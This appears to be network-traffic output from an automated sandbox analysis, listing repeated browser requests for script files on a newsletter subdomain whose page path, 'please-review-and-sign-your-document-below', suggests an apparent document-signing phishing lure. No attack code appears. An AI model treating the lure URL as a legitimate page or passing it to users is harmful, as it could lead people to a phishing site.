Source: global trafficHTTP traffic detected: GET /assets/index-BxYGUTX4.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/PoweredByBeehiiv-BmLCj73J.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/XMarkIcon-Y2tO3Ykg.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-pnFxOaac.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-IxBbnf-Q.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useIsMobile-onEuuMFV.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/CreateAction-Dl0JjCOR.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/disclosure-OT1gpdxK.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/SparklesIcon-DA4hsc2a.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useSetLastViewedResource-BelRoKi6.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DIU-Hrs1.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DcpNk-OI.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/popover-CV1J-FFp.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/ChevronDownIcon-CCywpT3m.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useSignupRedirects-DpD4LtfX.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/CheckIcon-681VH8qr.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useTypedLoaderData-Bk1_tu68.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useWebBuilderCommunicator-DoXoLq6Y.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/root-C5Mn_uH-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/XMarkIcon-Y2tO3Ykg.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useIsMobile-onEuuMFV.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-pnFxOaac.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/LockClosedIcon-BluoCUMI.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/disclosure-OT1gpdxK.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/SparklesIcon-DA4hsc2a.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-IxBbnf-Q.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/ArrowLeftIcon-Dz9QYxn0.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/ChevronRightIcon-Dsmk2epM.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/relativeTime-tlGPeD3Q.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/HeroChatIcon-DZxH_rr3.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useSignupRedirects-DpD4LtfX.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
